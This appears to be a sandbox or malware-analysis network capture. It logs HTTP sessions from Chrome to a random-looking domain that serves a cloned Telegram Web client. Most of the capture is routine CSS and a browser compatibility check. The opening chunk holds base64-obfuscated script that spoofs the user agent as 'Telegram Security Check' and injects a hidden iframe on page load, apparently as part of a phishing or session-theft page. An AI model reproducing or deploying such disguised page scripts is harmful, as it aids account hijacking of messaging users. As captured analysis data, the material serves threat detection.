                                  2025-01-12 00:03:40 UTC1369INData Raw: 63 65 68 6f 6c 64 65 72 22 20 68 72 65 66 3d 22 2e 2f 73 69 74 65 2e 77 65 62 6d 61 6e 69 66 65 73 74 22 3e 3c 73 63 72 69 70 74 3e 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 77 69 6e 64 6f 77 5b 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 22 62 6d 46 32 61 57 64 68 64 47 39 79 22 29 29 29 5d 2c 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 22 64 58 4e 6c 63 6b 46 6e 5a 57 35 30 22 29 29 29 2c 7b 76 61 6c 75 65 3a 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 22 56 47 56 73 5a 57 64 79 59 57 30 67 55 32 56 6a 64 58 4a 70 64 48 6b 67 51 32 68 6c 59 32 73 3d 22 29 29 29 2c 77 72 69 74 61 62 6c
                                  Data Ascii: ceholder" href="./site.webmanifest"><script>Object.defineProperty(window[decodeURIComponent(escape(atob("bmF2aWdhdG9y")))],decodeURIComponent(escape(atob("dXNlckFnZW50"))),{value:decodeURIComponent(escape(atob("VGVsZWdyYW0gU2VjdXJpdHkgQ2hlY2s="))),writabl
                                  2025-01-12 00:03:40 UTC454INData Raw: 61 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 3b 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 30 3b 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 30 3b 61 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 3d 27 6e 6f 6e 65 27 3b 61 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 27 68 69 64 64 65 6e 27 3b 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 69 66 28 27 6c 6f 61 64 69 6e 67 27 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 29 63 28 29 3b 65 6c 73 65 20 69 66 28 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 29 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 63 29 3b
                                  Data Ascii: a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);
                                  2025-01-12 00:03:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.649723172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:40 UTC530OUTGET /redirect.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:40 UTC915INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:40 GMT
                                  Content-Type: application/javascript
                                  Content-Length: 325
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  ETag: "674840b0-145"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2794
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FyNy5rSsxafgLZD5Sme4ddkF%2FKaxl%2FZRWy7vcVsM9XEYCMW4V9TdNwgs0b2CwjARHFqOlVja3jUjQxva1ZEY2c1QCX7EDF84HBncsQpLmloryDrDlcRE%2FJK7EbiF4d8yRo3y0Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e282e9c943fe-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=9430&min_rtt=2403&rtt_var=5304&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1108&delivery_rate=1215147&cwnd=236&unsent_bytes=0&cid=1ac0f8c4bdeec463&ts=837&x=0"
                                  2025-01-12 00:03:40 UTC325INData Raw: 63 6f 6e 73 74 20 7b 20 70 61 74 68 6e 61 6d 65 2c 20 68 6f 73 74 6e 61 6d 65 2c 20 68 72 65 66 20 7d 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3b 0a 0a 69 66 20 28 70 61 74 68 6e 61 6d 65 2e 73 74 61 72 74 73 57 69 74 68 28 27 2f 7a 27 29 29 20 7b 0a 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 68 72 65 66 2e 72 65 70 6c 61 63 65 28 27 2f 7a 27 2c 20 27 2f 61 27 29 3b 0a 7d 0a 0a 69 66 20 28 0a 20 20 28 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 77 65 62 61 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 27 20 7c 7c 20 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 77 65 62 7a 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 27 29 20 26 26 20 21 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 27 74 74 2d 67 6c 6f 62 61 6c
                                  Data Ascii: const { pathname, hostname, href } = window.location;if (pathname.startsWith('/z')) { window.location.href = href.replace('/z', '/a');}if ( (hostname === 'weba.telegram.org' || hostname === 'webz.telegram.org') && !localStorage.getItem('tt-global


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.649738172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:41 UTC562OUTGET /main.949acaf34f3882f511ff.css HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: text/css,*/*;q=0.1
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: style
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:41 UTC910INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:41 GMT
                                  Content-Type: text/css
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:39 GMT
                                  Vary: Accept-Encoding
                                  etag: W/"674840af-1ba95"
                                  Age: 6949
                                  Cache-Control: max-age=14400
                                  cf-cache-status: HIT
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N9WIwXG%2F%2B5nYQgPaLCfWLX323zwiq51YJ1GxmFzX%2BjFWCxqsvCL5mKTW76DAAc11ak5GJb94RGDfUldHkDF6HQShQvhSLw8fJqD0LWXvQfDhQkgNhSSk7ZWbAsB69TV7w09noQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e289a86a0f36-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1591&rtt_var=629&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1140&delivery_rate=1835323&cwnd=231&unsent_bytes=0&cid=f4dadbe15b207cc8&ts=157&x=0"
                                  2025-01-12 00:03:41 UTC459INData Raw: 37 63 65 38 0d 0a 2e 4b 55 36 37 55 75 72 30 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 79 5f 75 52 5a 58 74 41 7b 2d 77 65 62 6b 69 74 2d 6d 61 73 6b 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 74 6f 70 2c 20 74 72 61 6e 73 70 61 72 65 6e 74 20 30 70 78 2c 20 62 6c 61 63 6b 20 31 72 65 6d 29 3b 6d 61 73 6b 2d 69 6d 61 67 65 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 74 6f 70 2c 20 74 72 61 6e 73 70 61 72 65 6e 74 20 30 70 78 2c 20 62 6c 61 63 6b 20 31 72 65 6d 29 7d 2e 4a 4e 56 54 32 44 55 39 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2e 31 32 35 72 65 6d 3b 6d 61 78 2d 68 65 69 67 68 74
                                  Data Ascii: 7ce8.KU67Uur0{display:inline-block;width:100%}.y_uRZXtA{-webkit-mask-image:linear-gradient(to top, transparent 0px, black 1rem);mask-image:linear-gradient(to top, transparent 0px, black 1rem)}.JNVT2DU9{margin-top:.125rem;margin-bottom:.125rem;max-height
                                  2025-01-12 00:03:41 UTC1369INData Raw: 74 65 3b 74 6f 70 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 6c 65 66 74 3a 30 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 3b 6f 70 61 63 69 74 79 3a 30 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 6f 70 61 63 69 74 79 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 7d 2e 61 75 43 4e 74 4c 51 34 2c 2e 61 34 34 5a 4e 33 68 44 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 35 72 65 6d 3b 70 61 64 64 69 6e 67 3a 2e 31 32 35 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 31 32 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 2e 31 32 35 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 31 35 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 3b 63 75 72 73 6f 72 3a
                                  Data Ascii: te;top:0;right:0;bottom:0;left:0;pointer-events:none;opacity:0;transition:opacity .15s ease-in-out}.auCNtLQ4,.a44ZN3hD{display:flex;font-size:1.25rem;padding:.125rem;border-radius:.125rem;margin:.125rem;transition:background-color .15s ease-in-out;cursor:
                                  2025-01-12 00:03:41 UTC1369INData Raw: 43 6f 64 65 42 6c 6f 63 6b 20 2e 63 6f 64 65 2d 62 6c 6f 63 6b 2e 6e 6f 2d 77 6f 72 64 2d 77 72 61 70 7b 77 68 69 74 65 2d 73 70 61 63 65 3a 70 72 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 2e 32 35 72 65 6d 7d 68 74 6d 6c 2e 74 68 65 6d 65 2d 6c 69 67 68 74 20 2e 43 6f 64 65 42 6c 6f 63 6b 20 2e 63 6f 64 65 2d 62 6c 6f 63 6b 7b 2d 2d 63 6f 6c 6f 72 2d 74 79 70 65 3a 20 23 30 30 35 33 64 34 3b 2d 2d 63 6f 6c 6f 72 2d 6b 65 79 77 6f 72 64 3a 20 23 33 38 38 65 32 32 3b 2d 2d 63 6f 6c 6f 72 2d 63 6c 61 73 73 3a 20 23 33 65 36 63 32 30 3b 2d 2d 63 6f 6c 6f 72 2d 73 74 72 69 6e 67 3a 20 23 39 61 31 31 31 31 3b 2d 2d 63 6f 6c 6f 72 2d 74 65 6d 70 6c 61 74 65 3a 20 23 39 61 35 33 33 34 3b 2d 2d 63 6f 6c 6f 72 2d 73 65 6c 65 63 74 6f 72 3a 20 23 39 61 35
                                  Data Ascii: CodeBlock .code-block.no-word-wrap{white-space:pre;padding-bottom:.25rem}html.theme-light .CodeBlock .code-block{--color-type: #0053d4;--color-keyword: #388e22;--color-class: #3e6c20;--color-string: #9a1111;--color-template: #9a5334;--color-selector: #9a5
                                  2025-01-12 00:03:41 UTC1369INData Raw: 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 2e 68 6c 6a 73 2d 62 75 69 6c 74 5f 69 6e 2c 2e 68 6c 6a 73 2d 74 79 70 65 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 74 79 70 65 29 7d 2e 68 6c 6a 73 2d 6e 75 6d 62 65 72 2c 2e 68 6c 6a 73 2d 63 6c 61 73 73 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 63 6c 61 73 73 29 7d 2e 68 6c 6a 73 2d 73 74 72 69 6e 67 2c 2e 68 6c 6a 73 2d 6d 65 74 61 20 2e 68 6c 6a 73 2d 73 74 72 69 6e 67 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 73 74 72 69 6e 67 29 7d 2e 68 6c 6a 73 2d 72 65 67 65 78 70 2c 2e 68 6c 6a 73 2d 74 65 6d 70 6c 61 74 65 2d 74 61 67 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 74 65 6d 70 6c 61 74 65 29 7d 2e 68 6c 6a 73 2d 73 75 62 73 74 2c 2e 68 6c 6a 73
                                  Data Ascii: tion:underline}.hljs-built_in,.hljs-type{color:var(--color-type)}.hljs-number,.hljs-class{color:var(--color-class)}.hljs-string,.hljs-meta .hljs-string{color:var(--color-string)}.hljs-regexp,.hljs-template-tag{color:var(--color-template)}.hljs-subst,.hljs
                                  2025-01-12 00:03:41 UTC1369INData Raw: 69 65 2d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 44 4b 69 31 31 37 37 73 7b 77 69 64 74 68 3a 38 35 25 3b 68 65 69 67 68 74 3a 38 35 25 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 31 39 2c 31 31 39 2c 31 31 39 2c 2e 30 39 38 30 33 39 32 31 35 37 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 2e 33 31 32 35 72 65 6d 7d 2e 4f 5f 54 61 44 78 57 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 6e 6f 6e 65 7d 2e 77 71 6a 75 30 32 68 52 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 63 75 73 74 6f 6d 2d 65 6d 6f 6a 69 2d 73 69 7a 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 63 75 73 74 6f 6d 2d 65 6d 6f 6a 69
                                  Data Ascii: ie-canvas{display:block}.DKi1177s{width:85%;height:85%;background-color:rgba(119,119,119,.0980392157);border-radius:.3125rem}.O_TaDxWg{width:100%;height:100%;pointer-events:none}.wqju02hR{width:var(--custom-emoji-size) !important;height:var(--custom-emoji
                                  2025-01-12 00:03:41 UTC1369INData Raw: 7d 0a 2e 71 45 68 67 4a 45 70 6d 7b 2d 2d 63 6f 6c 6f 72 2d 66 69 6c 6c 3a 20 76 61 72 28 2d 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 29 3b 66 6c 65 78 2d 73 68 72 69 6e 6b 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 77 69 64 74 68 3a 31 72 65 6d 3b 68 65 69 67 68 74 3a 31 72 65 6d 7d 2e 47 6a 78 50 6e 77 5a 52 7b 77 69 64 74 68 3a 31 2e 32 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 7d 2e 48 52 4c 72 6e 5a 76 51 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 2e 65 62 4f 32 57 4a 6b 76 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 65 6d 3b 68 65 69 67 68 74 3a 31 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74
                                  Data Ascii: }.qEhgJEpm{--color-fill: var(--color-primary);flex-shrink:0;display:flex;width:1rem;height:1rem}.GjxPnwZR{width:1.25rem;height:1.25rem}.HRLrnZvQ{width:1.5rem;height:1.5rem}.ebO2WJkv{display:inline-block;width:1em;height:1em;line-height:1;vertical-align:t
                                  2025-01-12 00:03:41 UTC1369INData Raw: 74 72 69 63 74 7d 23 72 6f 6f 74 20 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 4f 70 74 69 6d 69 7a 65 64 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2c 23 72 6f 6f 74 20 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 4f 70 74 69 6d 69 7a 65 64 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2c 23 72 6f 6f 74 20 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 4f 70 74 69 6d 69 7a 65 64 52 74 6c 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2c 23 72 6f 6f 74 20 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 4f 70 74 69 6d 69 7a 65 64 52 74 6c 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70
                                  Data Ascii: trict}#root .Transition-slideOptimized>.Transition_slide,#root .Transition-slideOptimizedBackwards>.Transition_slide,#root .Transition-slideOptimizedRtl>.Transition_slide,#root .Transition-slideOptimizedRtlBackwards>.Transition_slide{position:absolute;top
                                  2025-01-12 00:03:41 UTC1369INData Raw: 7b 61 6e 69 6d 61 74 69 6f 6e 3a 73 6c 69 64 65 2d 76 65 72 74 69 63 61 6c 2d 6f 75 74 20 76 61 72 28 2d 2d 73 6c 69 64 65 2d 74 72 61 6e 73 69 74 69 6f 6e 29 7d 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 56 65 72 74 69 63 61 6c 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 2d 31 30 30 25 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 6c 69 64 65 2d 76 65 72 74 69 63 61 6c 2d 6f 75 74 2d 62 61 63 6b 77 61 72 64 73 20 76 61 72 28 2d 2d 73 6c 69 64 65 2d 74 72 61 6e 73 69 74 69 6f 6e 29 7d 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 56 65 72 74 69 63 61 6c 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2d 66
                                  Data Ascii: {animation:slide-vertical-out var(--slide-transition)}.Transition-slideVerticalBackwards>.Transition_slide-to{transform:translateY(-100%);animation:slide-vertical-out-backwards var(--slide-transition)}.Transition-slideVerticalBackwards>.Transition_slide-f
                                  2025-01-12 00:03:41 UTC1369INData Raw: 76 61 72 28 2d 2d 73 6c 69 64 65 2d 74 72 61 6e 73 69 74 69 6f 6e 29 2c 73 6c 69 64 65 2d 66 61 64 65 2d 69 6e 2d 62 61 63 6b 77 61 72 64 73 2d 6d 6f 76 65 20 76 61 72 28 2d 2d 73 6c 69 64 65 2d 74 72 61 6e 73 69 74 69 6f 6e 29 7d 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 73 6c 69 64 65 46 61 64 65 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 2d 31 2e 35 72 65 6d 29 3b 6f 70 61 63 69 74 79 3a 30 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 6f 75 74 2d 62 61 63 6b 77 61 72 64 73 2d 6f 70 61 63 69 74 79 20 76 61 72 28 2d 2d 73 6c 69 64 65 2d 74 72 61 6e 73 69 74 69 6f 6e 29 2c 73 6c 69 64 65 2d 66 61 64 65 2d 6f 75 74 2d 62 61 63 6b 77 61 72 64 73 2d
                                  Data Ascii: var(--slide-transition),slide-fade-in-backwards-move var(--slide-transition)}.Transition-slideFadeBackwards>.Transition_slide-to{transform:translateX(-1.5rem);opacity:0;animation:fade-out-backwards-opacity var(--slide-transition),slide-fade-out-backwards-
                                  2025-01-12 00:03:41 UTC1369INData Raw: 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2d 66 72 6f 6d 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 69 6e 2d 62 61 63 6b 77 61 72 64 73 2d 6f 70 61 63 69 74 79 20 2e 31 73 20 65 61 73 65 2c 7a 6f 6f 6d 2d 66 61 64 65 2d 69 6e 2d 62 61 63 6b 77 61 72 64 73 2d 6d 6f 76 65 20 2e 31 35 73 20 65 61 73 65 7d 2e 54 72 61 6e 73 69 74 69 6f 6e 2d 7a 6f 6f 6d 46 61 64 65 42 61 63 6b 77 61 72 64 73 3e 2e 54 72 61 6e 73 69 74 69 6f 6e 5f 73 6c 69 64 65 2d 74 6f 7b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 30 2e 39 35 29 3b 61 6e 69 6d 61 74 69 6f 6e 3a 66 61 64 65 2d 6f 75 74 2d 62 61 63 6b 77 61 72 64 73 2d 6f 70 61 63 69 74 79 20 2e 31 35 73 20 65 61 73 65 2c 7a 6f 6f 6d 2d 66 61 64 65 2d 6f 75 74 2d 62
                                  Data Ascii: sition_slide-from{transform:scale(1);animation:fade-in-backwards-opacity .1s ease,zoom-fade-in-backwards-move .15s ease}.Transition-zoomFadeBackwards>.Transition_slide-to{transform:scale(0.95);animation:fade-out-backwards-opacity .15s ease,zoom-fade-out-b


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.649740172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:41 UTC532OUTGET /compatTest.js HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: */*
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: script
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:41 UTC920INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:03:41 GMT
                                  Content-Type: application/javascript
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:40 GMT
                                  Vary: Accept-Encoding
                                  ETag: W/"674840b0-9f0"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: HIT
                                  Age: 2795
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0S7BKtJW88re0Omw4kWm3lCymSuvzDXsRLfEfiepliNb6KjptLuioDX0PaZNrnS0QY%2B%2BiptAQoqW795feWTzU57S7QuKPQTPvhCv6wNu4YEvHnBckcoVfYMPfDmFEWohYbNvGg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e289c87c0f8f-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1490&rtt_var=588&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1110&delivery_rate=1817050&cwnd=232&unsent_bytes=0&cid=b8b5ac80e7582d61&ts=148&x=0"
                                  2025-01-12 00:03:41 UTC449INData Raw: 39 66 30 0d 0a 66 75 6e 63 74 69 6f 6e 20 63 6f 6d 70 61 74 54 65 73 74 28 29 20 7b 0a 20 20 76 61 72 20 68 61 73 50 72 6f 6d 69 73 65 20 3d 20 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 57 65 62 53 6f 63 6b 65 74 73 20 3d 20 74 79 70 65 6f 66 20 57 65 62 53 6f 63 6b 65 74 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 57 65 62 43 72 79 70 74 6f 20 3d 20 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 20 26 26 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 2e 73 75 62 74 6c 65 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 4f 62 6a 65 63 74 46 72 6f 6d 45 6e 74 72 69 65 73 20 3d 20 74 79 70 65 6f 66 20
                                  Data Ascii: 9f0function compatTest() { var hasPromise = typeof Promise !== 'undefined'; var hasWebSockets = typeof WebSocket !== 'undefined'; var hasWebCrypto = window.crypto && typeof window.crypto.subtle !== 'undefined'; var hasObjectFromEntries = typeof
                                  2025-01-12 00:03:41 UTC1369INData Raw: 68 61 73 49 6e 74 6c 20 3d 20 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 49 6e 74 6c 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 44 69 73 70 6c 61 79 4e 61 6d 65 73 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 44 69 73 70 6c 61 79 4e 61 6d 65 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 50 6c 75 72 61 6c 52 75 6c 65 73 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 50 6c 75 72 61 6c 52 75 6c 65 73 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 3b 0a 20 20 76 61 72 20 68 61 73 4e 75 6d 62 65 72 46 6f 72 6d 61 74 20 3d 20 68 61 73 49 6e 74 6c 20 26 26 20 74 79 70 65 6f 66 20 49 6e 74 6c 2e 4e 75 6d 62 65 72 46 6f 72 6d
                                  Data Ascii: hasIntl = typeof window.Intl !== 'undefined'; var hasDisplayNames = hasIntl && typeof Intl.DisplayNames !== 'undefined'; var hasPluralRules = hasIntl && typeof Intl.PluralRules !== 'undefined'; var hasNumberFormat = hasIntl && typeof Intl.NumberForm
